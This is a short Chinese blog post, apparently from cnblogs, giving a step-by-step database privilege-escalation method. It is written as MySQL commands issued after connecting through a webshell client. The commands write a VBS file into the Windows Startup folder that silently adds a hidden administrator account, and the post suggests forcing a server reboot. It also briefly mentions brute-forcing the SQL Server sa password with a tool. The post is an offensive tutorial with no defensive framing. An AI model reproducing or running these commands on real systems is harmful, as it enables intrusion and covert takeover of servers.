zoukankan      html  css  js  c++  java
  • 数据库提权

    mysql数据库启动项提权

    1、先连接菜刀
    mysql> create table a (cmd text); //创建表a,字段名字为cmd,以文本(text)的形式添加

    Mysql>insert into a values (“set wshshell=createobject (“”wscript.shell””)”);//给cmd字段加括号里面的东西:

    Mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user lanbo lanbo /add”“,0)”);
    //cmd.exe代表命令行,/c是没有回显,net user lanbo lanbo /add ,这个意思是加一个用户,也就是名字是lanbo,密码也是lanbo,””,0是断开的意思,和后面的

    Mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators lanbo /add"",0)");
    //这条语句的意思是将刚才创建的用户加到管理员组
    注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!

    mysql>select * from a;//确认插入的东西是否正确

    mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//lanbo.vbs";
    //在这个目录下创建一个名字为lanbo.vbs的启动项文件

    最后通过一些手段使服务器重启,执行这个启动项文件


    sqlserver提权


    1、爆破sa密码(用bruter工具)


    2、打开sqltool的工具,这个工具的作用就是用来连接数据库,使用数据库进行提权操作

     

     

     

  • 相关阅读:
    0414结对 复利
    0619-学习进度条
    测试
    冲刺一总结
    实验四主存空间的分配和回收
    0622-软件工程学期总结
    学术诚信与职业道德有感
    《构建之法》第8、9、10章
    0512 操作系统进程调度实验
    构建之法 第6~7章读后感和对Scrum的理解
  • 原文地址:https://www.cnblogs.com/1996-11-01-614lb/p/14342198.html
Copyright © 2011-2022 走看看